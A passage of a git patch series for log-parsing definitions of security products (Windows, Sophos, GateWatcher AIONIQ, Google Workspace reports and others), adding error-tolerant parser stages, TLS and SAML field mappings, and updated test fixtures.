From cb3e8051f3659825e515c09a49a008d51cdf033f Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 5 Nov 2024 17:14:08 +0200 Subject: [PATCH 01/84] Add connector info to VadeSecure M365 --- VadeSecure/vade_secure_m365/_meta/manifest.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml index 8c6e799a6..da4658b6a 100644 --- a/VadeSecure/vade_secure_m365/_meta/manifest.yml +++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml @@ -1,6 +1,8 @@ uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232 name: Vade for M365 slug: vade-m365 +automation_connector_uuid: aa1f6d1a-8821-467f-9801-a5293ed37616 +automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff description: >- Vade for M365 offers all protections from Vade to our Microsoft 365 Email service data_sources: From e3efa726bbbc5e423677c855d3287a3d8d717001 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 6 Nov 2024 12:26:50 +0200 Subject: [PATCH 02/84] Add `raise_errors` --- RSA/rsa-securid/ingest/parser.yml | 1 + Retarus/retarus_email_security/ingest/parser.yml | 2 ++ .../skyhigh_secure_web_gateway/ingest/parser.yml | 1 + SonicWall/sonicwall-fw/ingest/parser.yml | 2 ++ Sophos/sophos edr/ingest/parser.yml | 5 +++++ Squid/squid/ingest/parser.yml | 1 + Systancia/cleanroom/ingest/parser.yml | 1 + Tehtris/tehtris-edr/ingest/parser.yml | 1 + ThinkstCanary/thinkst-canary/ingest/parser.yml | 1 + Umbrella/umbrella-proxy/ingest/parser.yml | 1 + Veeam/veeam_backup/ingest/parser.yml | 1 + Wallix/wallix-bastion/ingest/parser.yml | 1 + Wallix/wallix-bastion/tests/cron.json | 3 +-- Wallix/wallix-bastion/tests/pam_unix.json | 3 +-- WatchGuard/watchguard-firebox/ingest/parser.yml | 1 + Windows/windows/ingest/parser.yml | 8 ++++++++ WithSecure/withsecure-elements/ingest/parser.yml | 2 ++ 17 files changed, 31 insertions(+), 4 deletions(-) diff --git a/RSA/rsa-securid/ingest/parser.yml b/RSA/rsa-securid/ingest/parser.yml index c70fee596..451c6f163 100644 --- a/RSA/rsa-securid/ingest/parser.yml +++ b/RSA/rsa-securid/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: dsv.parse-dsv properties: + raise_errors: false input_field: original.message output_field: message columnnames: diff --git a/Retarus/retarus_email_security/ingest/parser.yml b/Retarus/retarus_email_security/ingest/parser.yml index 6bd68803a..f55fa8ea7 100644 --- a/Retarus/retarus_email_security/ingest/parser.yml +++ b/Retarus/retarus_email_security/ingest/parser.yml @@ -7,6 +7,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.sender output_field: sender pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" @@ -15,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.recipient output_field: recipient pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" diff --git a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml index 9fc2ec259..20b07e5f4 100644 --- a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml +++ b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_kv.message.http_request_first_line}}" output_field: message pattern: "%{WORD:http_method} %{URL:url} HTTP/%{NUMBER:http_version}" diff --git a/SonicWall/sonicwall-fw/ingest/parser.yml b/SonicWall/sonicwall-fw/ingest/parser.yml index 8a913cd4e..03aa0ed21 100644 --- a/SonicWall/sonicwall-fw/ingest/parser.yml +++ b/SonicWall/sonicwall-fw/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.susr}}" output_field: result pattern: "(%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name})" @@ -47,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.msg}}" output_field: result pattern: "(%{GREEDYDATA}[F|f]ilename: %{FILE:filename}%{GREEDYDATA})" diff --git a/Sophos/sophos edr/ingest/parser.yml b/Sophos/sophos edr/ingest/parser.yml index f7dc22739..c4779fa3f 100644 --- a/Sophos/sophos edr/ingest/parser.yml +++ b/Sophos/sophos edr/ingest/parser.yml @@ -9,6 +9,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: 'Access was blocked to "%{URL:url}" because of "%{WORD:rulename}".' @@ -19,6 +20,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "Controlled application %{WORD}: %{GREEDYDATA:process_title}" @@ -27,6 +29,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "%{REMOVABLE_STORAGE}|%{STORAGE}" @@ -38,6 +41,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "PUA %{GREEDYDATA:action}: '%{GREEDYDATA:threat}' at '%{GREEDYDATA:file_path}'" @@ -46,6 +50,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "'%{GREEDYDATA:threat}' exploit prevented in %{GREEDYDATA:category}" diff --git a/Squid/squid/ingest/parser.yml b/Squid/squid/ingest/parser.yml index f5b9de6f9..14c43d5d1 100644 --- a/Squid/squid/ingest/parser.yml +++ b/Squid/squid/ingest/parser.yml @@ -48,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.url output_field: message pattern: "(%{IP:ip}|%{NOTSPACE:domain}):%{NUMBER:port}" diff --git a/Systancia/cleanroom/ingest/parser.yml b/Systancia/cleanroom/ingest/parser.yml index 0b80ff87c..44342010b 100644 --- a/Systancia/cleanroom/ingest/parser.yml +++ b/Systancia/cleanroom/ingest/parser.yml @@ -16,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{event.result.event_reason}}" output_field: result pattern: "%{SESSION_SUCCESS}|%{SESSION_FAILURE}|%{PROCESS}" diff --git a/Tehtris/tehtris-edr/ingest/parser.yml b/Tehtris/tehtris-edr/ingest/parser.yml index cbcb244bb..aa8f22411 100644 --- a/Tehtris/tehtris-edr/ingest/parser.yml +++ b/Tehtris/tehtris-edr/ingest/parser.yml @@ -23,6 +23,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.description}}" pattern: "(%{APPLICATION_POLICY}|%{URL_DETECTED}|%{MALICIOUS_MACRO})" custom_patterns: diff --git a/ThinkstCanary/thinkst-canary/ingest/parser.yml b/ThinkstCanary/thinkst-canary/ingest/parser.yml index f8cada9ff..8ce315396 100644 --- a/ThinkstCanary/thinkst-canary/ingest/parser.yml +++ b/ThinkstCanary/thinkst-canary/ingest/parser.yml @@ -21,6 +21,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parsed_event.message.DN}}" output_field: result value_sep: "=" diff --git a/Umbrella/umbrella-proxy/ingest/parser.yml b/Umbrella/umbrella-proxy/ingest/parser.yml index 790c57048..442c5da45 100644 --- a/Umbrella/umbrella-proxy/ingest/parser.yml +++ b/Umbrella/umbrella-proxy/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "event.message.http_request_url" output_field: message pattern: "(%{URIPROTO:url_scheme}://)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" diff --git a/Veeam/veeam_backup/ingest/parser.yml b/Veeam/veeam_backup/ingest/parser.yml index 5470c716c..7054d0a51 100644 --- a/Veeam/veeam_backup/ingest/parser.yml +++ b/Veeam/veeam_backup/ingest/parser.yml @@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.UserName}}" output_field: user pattern: '%{GREEDYDATA:domain}\\%{GREEDYDATA:name}' diff --git a/Wallix/wallix-bastion/ingest/parser.yml b/Wallix/wallix-bastion/ingest/parser.yml index ed76d3f43..d9f1be434 100644 --- a/Wallix/wallix-bastion/ingest/parser.yml +++ b/Wallix/wallix-bastion/ingest/parser.yml @@ -2,6 +2,7 @@ name: wallix-bastion ignored_values: ["-"] pipeline: - name: parsed_event + filter: '{{not original.message.startswith("pam_unix(")}}' external: name: kv.parse-kv properties: diff --git a/Wallix/wallix-bastion/tests/cron.json b/Wallix/wallix-bastion/tests/cron.json index da4487e2e..fdb9da3bc 100644 --- a/Wallix/wallix-bastion/tests/cron.json +++ b/Wallix/wallix-bastion/tests/cron.json @@ -15,7 +15,6 @@ }, "user": { "name": "root" - }, - "wallix": {} + } } } \ No newline at end of file diff --git a/Wallix/wallix-bastion/tests/pam_unix.json b/Wallix/wallix-bastion/tests/pam_unix.json index 5dd28b147..d7ce961b4 100644 --- a/Wallix/wallix-bastion/tests/pam_unix.json +++ b/Wallix/wallix-bastion/tests/pam_unix.json @@ -15,7 +15,6 @@ }, "user": { "name": "wabuser" - }, - "wallix": {} + } } } \ No newline at end of file diff --git a/WatchGuard/watchguard-firebox/ingest/parser.yml b/WatchGuard/watchguard-firebox/ingest/parser.yml index 23bdfd0d6..36e32c512 100644 --- a/WatchGuard/watchguard-firebox/ingest/parser.yml +++ b/WatchGuard/watchguard-firebox/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.msg}}" output_field: message pattern: "%{DHCP}|%{USER_LOG}" diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 988ae3dbc..5fc6b2eec 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Hashes or json.event.Hash}}" output_field: result value_sep: "=" @@ -46,6 +47,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Hashes or json.event.Hash}}" output_field: result value_sep: ":" @@ -84,6 +86,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json.event.IpAddress}}" output_field: event pattern: "%{GREEDYDATA}%{IPV4:ip}%{GREEDYDATA}" @@ -94,6 +97,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_message_kv.result.Contents}}" output_field: event pattern: >- @@ -105,6 +109,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json.event.url or json.event.RemoteName}}" output_field: event pattern: >- @@ -116,6 +121,7 @@ pipeline: name: grok.match description: #NEWLINE# is used because grok does not match multi-line fields and the KV stage does not support this field format. properties: + raise_errors: false input_field: '{{json.event.ContextInfo.replace(" "," ").replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: event pattern: "%{CONTEXTINFO_FR}|%{CONTEXTINFO_EN}" @@ -128,6 +134,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: result pattern: >- @@ -139,6 +146,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: event pattern: >- diff --git a/WithSecure/withsecure-elements/ingest/parser.yml b/WithSecure/withsecure-elements/ingest/parser.yml index 83bd21cff..3f8525c4d 100644 --- a/WithSecure/withsecure-elements/ingest/parser.yml +++ b/WithSecure/withsecure-elements/ingest/parser.yml @@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.details.userName}}" output_field: user pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})" @@ -25,6 +26,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.userName}}" output_field: user pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})" From ae8806c15f2905ce6b5333b2a4e82d8daa138ec9 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 6 Nov 2024 12:52:13 +0200 Subject: [PATCH 03/84] Fix linting --- Wallix/wallix-bastion/tests/session_integrity.json | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 39e8a6363..1c01481e9 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json @@ -6,13 +6,19 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": ["session"], + "category": [ + "session" + ], "dataset": "session_integrity", "outcome": "failure", - "type": ["info"] + "type": [ + "info" + ] }, "related": { - "user": ["adm@CORP.NET@1.1.1.1"] + "user": [ + "adm@CORP.NET@1.1.1.1" + ] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -21,4 +27,4 @@ "type": "SSH_SHELL_SESSION" } } -} +} \ No newline at end of file From 1722cb45207026aa7f8802b095f9ffb60f25f7b7 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 8 Nov 2024 09:18:29 +0200 Subject: [PATCH 04/84] Fix windows --- Windows/windows/ingest/parser.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 5fc6b2eec..e21ec0b94 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -24,6 +24,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Message}}" output_field: result value_sep: ":" From 5108adaff0f103cfa4a6e28e6c191fc80ae21c4c Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 8 Nov 2024 12:19:44 +0200 Subject: [PATCH 05/84] Fix connector UUID --- VadeSecure/vade_secure_m365/_meta/manifest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml index da4658b6a..49acafa59 100644 --- a/VadeSecure/vade_secure_m365/_meta/manifest.yml +++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml @@ -1,7 +1,7 @@ uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232 name: Vade for M365 slug: vade-m365 -automation_connector_uuid: aa1f6d1a-8821-467f-9801-a5293ed37616 +automation_connector_uuid: d3860745-4433-4690-b025-378369ad7201 automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff description: >- Vade for M365 offers all protections from Vade to our Microsoft 365 Email service From b03ca79d59d45dcd12914df6cd8e3532e5912016 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 12 Nov 2024 10:23:11 +0100 Subject: [PATCH 06/84] Fixing parsed_date to match with detection and not analysis --- GateWatcher/aioniq/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 45330587a..ba98a034e 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -10,7 +10,7 @@ pipeline: external: name: date.parse properties: - input_field: "{{json_load.message.timestamp_analyzed}}" + input_field: "{{json_load.message.timestamp_detected}}" output_field: datetime format: null timezone: UTC From 19383dc28b0a3a0e9a42995cf66cd68f11194583 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 12 Nov 2024 11:43:06 +0100 Subject: [PATCH 07/84] Parsing of TLS metadata using ECS tls.server.* fields and two custom fields --- GateWatcher/aioniq/_meta/fields.yml | 12 ++++++++---- GateWatcher/aioniq/ingest/parser.yml | 14 +++++++++++++- 2 files changed, 21 insertions(+), 5 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index d0d85f7f6..7fb7e28af 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -384,10 +384,14 @@ gatewatcher.tlp: name: gatewatcher.tlp type: text -gatewatcher.tls: - description: This field represents the tls field in a network metadata (used in - legacy format log) - name: gatewatcher.tls +gatewatcher.tls.sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls.sni + type: text + +gatewatcher.tls.fingerprint: + description: This field represents the TLS server fingerprint field in a TLS metadata + name: gatewatcher.tls.fingerprint type: text gatewatcher.ttp: diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index ba98a034e..b71064e6d 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -29,6 +29,8 @@ pipeline: description: DGA - name: retrohunt description: Retrohunt + - name: tls + description: TLS stages: common: actions: @@ -122,7 +124,6 @@ stages: gatewatcher.sip: "{{json_load.message.sip}}" gatewatcher.smb: "{{json_load.message.smb}}" gatewatcher.ssh: "{{json_load.message.ssh}}" - gatewatcher.tls: "{{json_load.message.tls}}" file.hash.sha256: "{{json_load.message.fileinfo.sha256}}" gatewatcher.dhcp: "{{json_load.message.dhcp}}" gatewatcher.dnp3: "{{json_load.message.dnp3}}" @@ -202,3 +203,14 @@ stages: gatewatcher.targeted_countries: "{{json_load.message.targeted_countries}}" gatewatcher.targeted_platforms: "{{json_load.message.targeted_platforms}}" gatewatcher.targeted_organizations: "{{json_load.message.targeted_organizations}}" + tls: + actions: + - set: + tls.server.issuer: "{{json_load.message.tls.issuerdn}}" + tls.server.not_before: "{{json_load.message.tls.notbefore}}" + tls.server.certificate_chain: "{{json_load.message.tls.chain}}" + tls.server.subject: "{{json_load.message.tls.subject}}" + gatewatcher.tls.sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls.fingerprint: "{{json_load.message.tls.fingerprint}}" + tls.version: "{{json_load.message.tls.version}}" + tls.server.not_after: "{{json_load.message.tls.notafter}}" From dabf885f938ac4fb194fce490569c8689ef40983 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 12 Nov 2024 11:52:07 +0100 Subject: [PATCH 08/84] Updated tests --- GateWatcher/aioniq/tests/codebreaker.json | 2 +- GateWatcher/aioniq/tests/dga.json | 2 +- GateWatcher/aioniq/tests/malcore.json | 2 +- GateWatcher/aioniq/tests/retrohunt.json | 2 +- GateWatcher/aioniq/tests/sigflow-alert.json | 2 +- GateWatcher/aioniq/tests/sigflow-file.json | 2 +- GateWatcher/aioniq/tests/sigflow-meta.json | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json index f16f95623..6d7eb789a 100644 --- a/GateWatcher/aioniq/tests/codebreaker.json +++ b/GateWatcher/aioniq/tests/codebreaker.json @@ -17,7 +17,7 @@ "module": "powershell", "severity": 1 }, - "@timestamp": "2023-03-22T10:32:50.269000Z", + "@timestamp": "2023-03-22T10:30:37.145000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json index b9db082ca..9d702ce4d 100644 --- a/GateWatcher/aioniq/tests/dga.json +++ b/GateWatcher/aioniq/tests/dga.json @@ -17,7 +17,7 @@ "module": "dga", "severity": 1 }, - "@timestamp": "2023-03-22T10:46:08.487000Z", + "@timestamp": "2023-03-22T10:25:54.903000Z", "destination": { "address": "pgoadcmgqfacj.com", "domain": "pgoadcmgqfacj.com", diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json index ba95cc211..b5d0a4f69 100644 --- a/GateWatcher/aioniq/tests/malcore.json +++ b/GateWatcher/aioniq/tests/malcore.json @@ -20,7 +20,7 @@ "info" ] }, - "@timestamp": "2023-03-22T10:53:13.408000Z", + "@timestamp": "2023-03-22T10:35:22.615000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json index fd29bcfa4..7c8728304 100644 --- a/GateWatcher/aioniq/tests/retrohunt.json +++ b/GateWatcher/aioniq/tests/retrohunt.json @@ -17,7 +17,7 @@ "module": "retrohunt", "severity": 1 }, - "@timestamp": "2023-06-12T10:12:39.001000Z", + "@timestamp": "2023-06-09T14:08:46.845000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json index 1de9534f5..626ee8eb7 100644 --- a/GateWatcher/aioniq/tests/sigflow-alert.json +++ b/GateWatcher/aioniq/tests/sigflow-alert.json @@ -19,7 +19,7 @@ "module": "alert", "severity": 1 }, - "@timestamp": "2023-03-22T10:44:08.001000Z", + "@timestamp": "2023-03-22T10:25:55.690000Z", "destination": { "address": "2.2.2.2", "bytes": 90364, diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json index 2e1580dce..7e9cc8b6a 100644 --- a/GateWatcher/aioniq/tests/sigflow-file.json +++ b/GateWatcher/aioniq/tests/sigflow-file.json @@ -16,7 +16,7 @@ ], "module": "fileinfo" }, - "@timestamp": "2023-03-22T10:44:07.998000Z", + "@timestamp": "2023-03-22T10:25:55.469000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json index 4da5dbc30..6e8cba037 100644 --- a/GateWatcher/aioniq/tests/sigflow-meta.json +++ b/GateWatcher/aioniq/tests/sigflow-meta.json @@ -16,7 +16,7 @@ ], "module": "http" }, - "@timestamp": "2023-03-22T10:44:07.997000Z", + "@timestamp": "2023-03-22T10:25:55.377000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", From 71bb0846a7cd6f72a28493543d4b1066215d3dcd Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Wed, 13 Nov 2024 10:52:05 +0100 Subject: [PATCH 09/84] Fixing tls and tls_* fields --- GateWatcher/aioniq/_meta/fields.yml | 13 +++++++++---- GateWatcher/aioniq/ingest/parser.yml | 5 +++-- 2 files changed, 12 insertions(+), 6 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 7fb7e28af..07bae26e7 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -384,14 +384,19 @@ gatewatcher.tlp: name: gatewatcher.tlp type: text -gatewatcher.tls.sni: +gatewatcher.tls: + description: This field contains all TLS data fields in a TLS metadata + name: gatewatcher.tls + type: text + +gatewatcher.tls_sni: description: This field represents the TLS SNI field in a TLS metadata - name: gatewatcher.tls.sni + name: gatewatcher.tls_sni type: text -gatewatcher.tls.fingerprint: +gatewatcher.tls_fingerprint: description: This field represents the TLS server fingerprint field in a TLS metadata - name: gatewatcher.tls.fingerprint + name: gatewatcher.tls_fingerprint type: text gatewatcher.ttp: diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index b71064e6d..3cc13d747 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -210,7 +210,8 @@ stages: tls.server.not_before: "{{json_load.message.tls.notbefore}}" tls.server.certificate_chain: "{{json_load.message.tls.chain}}" tls.server.subject: "{{json_load.message.tls.subject}}" - gatewatcher.tls.sni: "{{json_load.message.tls.sni}}" - gatewatcher.tls.fingerprint: "{{json_load.message.tls.fingerprint}}" + gatewatcher.tls: "{{json_load.message.tls}}" + gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" tls.version: "{{json_load.message.tls.version}}" tls.server.not_after: "{{json_load.message.tls.notafter}}" From ec5851efc208a5fa84e247079c402e3bb4b2472d Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 13 Nov 2024 15:45:33 +0100 Subject: [PATCH 10/84] refactor(Windows): merge source_ip and source_address into one stage --- Windows/windows/ingest/parser.yml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 988ae3dbc..f0bd6640b 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -153,8 +153,7 @@ pipeline: - name: set_file - name: set_user - name: process_ids - - name: source_ip - - name: source_address + - name: set_source_fields - name: action_outcome - name: set_dll filter: "{{ json.event.SourceName == 'Microsoft-Windows-Sysmon' and json.event.EventID == 7}}" @@ -1106,7 +1105,7 @@ stages: action.outcome: "failure" filter: "{{json.event.EventType == 'AUDIT_FAILURE' }}" - source_ip: + set_source_fields: actions: - set: source.ip: "{{json.event.SourceIp or json.event.SourceAddress}}" @@ -1131,8 +1130,6 @@ stages: - set: source.ip: "{{source_ip_ip_address.event.ip}}" - source_address: - actions: - set: source.address: "{{json.event.SourceIp}}" filter: "{{json.event.SourceIp | is_ipaddress}}" From 042e95418f89dd14ed87a57760af748a55ddbd75 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Wed, 13 Nov 2024 15:56:25 +0100 Subject: [PATCH 11/84] Add saml seervice to the parser --- Google Cloud/google-report/_meta/fields.yml | 15 +++ .../_meta/smart-descriptions.json | 114 ++++++++++++++++++ Google Cloud/google-report/ingest/parser.yml | 20 +++ .../tests/test_saml_login_success.json | 63 ++++++++++ .../tests/test_saml_login_success_1.json | 63 ++++++++++ 5 files changed, 275 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_saml_login_success.json create mode 100644 Google Cloud/google-report/tests/test_saml_login_success_1.json diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 84b0db0f6..ad86f9169 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -42,3 +42,18 @@ google.report.token.type: description: Token type name: google.report.token.type type: keyword + +google.report.saml.status_code: + description: SAML response status + name: google.report.saml.status_code + type: keyword + +google.report.saml.initiator: + description: SAML requester of saml authentication + name: google.report.saml.initiator + type: keyword + +google.report.saml.application_name: + description: Saml SP application name + name: google.report.saml.application_name + type: keyword diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6a934ee3d..6fa8c709a 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -168,6 +168,120 @@ } ] }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + }, + { + "field": "google.report.saml.status_code" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..e00c5ee79 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -28,6 +28,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "admin"}}' - name: set_vault_fields filter: '{{ 